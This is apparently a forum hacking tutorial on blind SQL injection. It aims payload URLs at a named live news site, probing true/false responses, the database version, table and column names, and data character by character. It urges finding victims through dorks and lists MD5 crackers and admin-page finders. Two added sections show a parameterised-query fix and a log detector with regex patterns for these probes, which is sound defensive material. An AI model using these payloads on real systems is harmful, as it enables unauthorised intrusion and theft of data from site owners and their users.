S0.6 - Blind SQL Injection
Let me start off by saying, blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Let's get started anyway. I found a site which I could use union based injection on, so I wouldn't have to guess the table names, which made this tutorial a lot easier to write.
First of all we will want to find a site using dorks, mentioned earlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based, I'll make a tutorial for that soon).
When we have our site with a vulnerable parameter, you will want to test whether it is actually vulnerable. We can do this by adding "and 1=1" onto the end of our URL; if the page loads normally, that's good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=1
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=2
It does this because you're either providing a true or false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
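To make that true/false behaviour concrete from the application side, here is an added example (not code from this tutorial or from the site it uses) that rebuilds a tiny "news.php?newsid=" lookup on an in-memory SQLite table. The table, its rows and the function names are constructed for the example. It runs the "and 1=1" / "and 1=2" probes against the string-concatenation pattern that makes the page vulnerable, and against a version that validates the parameter and binds it, so you can see exactly why one version answers the oracle and the other does not.

```python
import sqlite3

# Added example (not the page's own code): an in-memory stand-in for the
# "news.php?newsid=" lookup, so the true/false behaviour described above can be
# reproduced offline. The table, its columns and the rows are constructed.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(125, "Older story"), (126, "Story 126"), (127, "Newer story")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, newsid: str):
    """The pattern behind the tutorial: the parameter is glued into the SQL text,
    so anything after the number becomes part of the WHERE clause."""
    sql = "SELECT title FROM news WHERE newsid=" + newsid
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn: sqlite3.Connection, newsid: str):
    """The fix: reject anything that is not an integer, then bind the value as a
    parameter so it can never change the structure of the statement."""
    if not newsid.isdigit():
        raise ValueError("newsid must be an integer")
    row = conn.execute(
        "SELECT title FROM news WHERE newsid=?", (int(newsid),)
    ).fetchone()
    return row[0] if row else None


def compare_probes() -> dict:
    """Runs the tutorial's 'and 1=1' / 'and 1=2' probes against both versions and
    records whether the page would 'load normally' (a row came back).
    Keys are (variant, probe); values are the title, None, or 'rejected'."""
    conn = make_db()
    results = {}
    for probe in ("126", "126 and 1=1", "126 and 1=2"):
        results[("vulnerable", probe)] = lookup_vulnerable(conn, probe)
        try:
            results[("safe", probe)] = lookup_safe(conn, probe)
        except ValueError:
            results[("safe", probe)] = "rejected"
    return results


if __name__ == "__main__":
    for (variant, probe), outcome in compare_probes().items():
        print(f"{variant:10s} newsid={probe!r:20} -> {outcome}")
```

The vulnerable lookup returns the story for "126 and 1=1" and nothing for "126 and 1=2", which is the difference in page output the tutorial reads. The safe lookup never reaches the database with either probe, so there is no difference to observe; binding alone would also have defeated it, but rejecting non-numeric input first gives you a clean log entry to alert on.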
To find the version we will want to use
Code:
and substring(@@version,1,1)=VERSIONHERE
Where we have "VERSIONHERE", you will want to put the version there. Most sites would use either 4 or 5. Using what I said earlier, if the version is false, the page won't load correctly. If it is true, it will.
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5
So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info as we would in a union based injection.
Now to find the tables we will have to guess the names. Since union based injection works on the site I'm using as an example, I just quickly got the tables/columns that way to keep the tutorial simple. Otherwise you would have to guess them. You could use common table names such as admin, user, login etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT 1 from test limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT 1 from test2 limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT 1 from chapters limit 0,1)=1
Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1
After you have done that, here comes the really time consuming part. We will have to guess each letter of the data value, one by one, by its ASCII code. So "test" = "74 65 73 74" in hex. You can find an ASCII chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the HackBar add-on for Firefox. Or use this - http://easycalculation.com/ascii-hex.php.
We will want to use -
Code:
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE
It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106
Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>111
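From the defending side, every step above leaves a distinctive trail: the tautology pair, the @@version probe, and then a long run of ascii(substring(...)) requests from one address, all returning HTTP 200 but with two different response sizes. The following added example (not part of this tutorial, and not any vendor's detection rule) parses constructed common-log-format lines that replay those probes, classifies each request against a small set of patterns derived from the payloads shown on this page, counts flagged requests per source address, and surfaces the response-size spread that is the true/false oracle. The log lines, addresses and function names are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines in common log format (not from any real
# server); the first five requests replay the probes shown in this tutorial.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?newsid=126 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?newsid=126%20and%201=1 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /news.php?newsid=126%20and%201=2 HTTP/1.1" 200 1480
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /news.php?newsid=126%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:57:12 +0000] "GET /news.php?newsid=126%20and%20ascii(substring((SELECT%20concat(user)%20from%20users%20WHERE%20id=1),1,1))%3E105 HTTP/1.1" 200 5123
198.51.100.9 - - [10/Oct/2023:13:58:00 +0000] "GET /news.php?newsid=127 HTTP/1.1" 200 4990
"""

# ip ident user [timestamp] "METHOD path PROTO" status bytes
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Each pattern corresponds to one step of the technique described above; they
# are applied to the URL-decoded query string.
PROBE_PATTERNS = [
    ("boolean tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("version probe", re.compile(r"@@version", re.I)),
    ("char-by-char extraction", re.compile(r"ascii\s*\(\s*substring", re.I)),
    ("subquery in parameter", re.compile(r"\(\s*select\b", re.I)),
]


def classify_request(path: str) -> list:
    """Return the names of every probe pattern found in the decoded query string."""
    query = unquote_plus(path.partition("?")[2])
    return [name for name, pattern in PROBE_PATTERNS if pattern.search(query)]


def find_probes(log_text: str) -> list:
    """Parse each log line and keep those whose query string matches a probe pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; skipped rather than silently mis-read
        ip, ts, method, path, status, size = m.groups()
        reasons = classify_request(path)
        if reasons:
            hits.append({
                "ip": ip, "time": ts, "method": method, "path": path,
                "status": status, "bytes": int(size) if size != "-" else 0,
                "reasons": reasons,
            })
    return hits


def probes_per_ip(log_text: str) -> Counter:
    """Count flagged requests per source address. Blind extraction needs several
    requests per character, so one address with a high count stands out."""
    return Counter(hit["ip"] for hit in find_probes(log_text))


def response_size_spread(log_text: str) -> dict:
    """Group flagged requests by source and by the untouched part of the query
    (everything before the injected ' and '). Distinct response sizes under a
    constant 200 status are the true/false signal the probes are reading."""
    sizes = {}
    for hit in find_probes(log_text):
        base = unquote_plus(hit["path"].partition("?")[2])
        base = re.split(r"\s+and\s+", base, maxsplit=1, flags=re.I)[0]
        sizes.setdefault((hit["ip"], base), set()).add(hit["bytes"])
    return {key: sorted(v) for key, v in sizes.items() if len(v) > 1}


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["bytes"], hit["reasons"])
    print("per source:", dict(probes_per_ip(SAMPLE_LOG)))
    print("size spread:", response_size_spread(SAMPLE_LOG))
```

Note that every flagged request here returned 200, so alerting on error codes alone would miss the whole session; the per-address count and the size spread for one base parameter are what separate a probing session from ordinary traffic. The decode step matters too: the same payloads arrive as %20 and %3E, or with + for spaces, and patterns run against the raw path would miss them.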
Resources.
http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites, saves a lot of time.
http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R. Supports PHP/CFM/HTML/ASP
http://www.string-functions.com/string-hex.aspx - String to hexadecimal converter.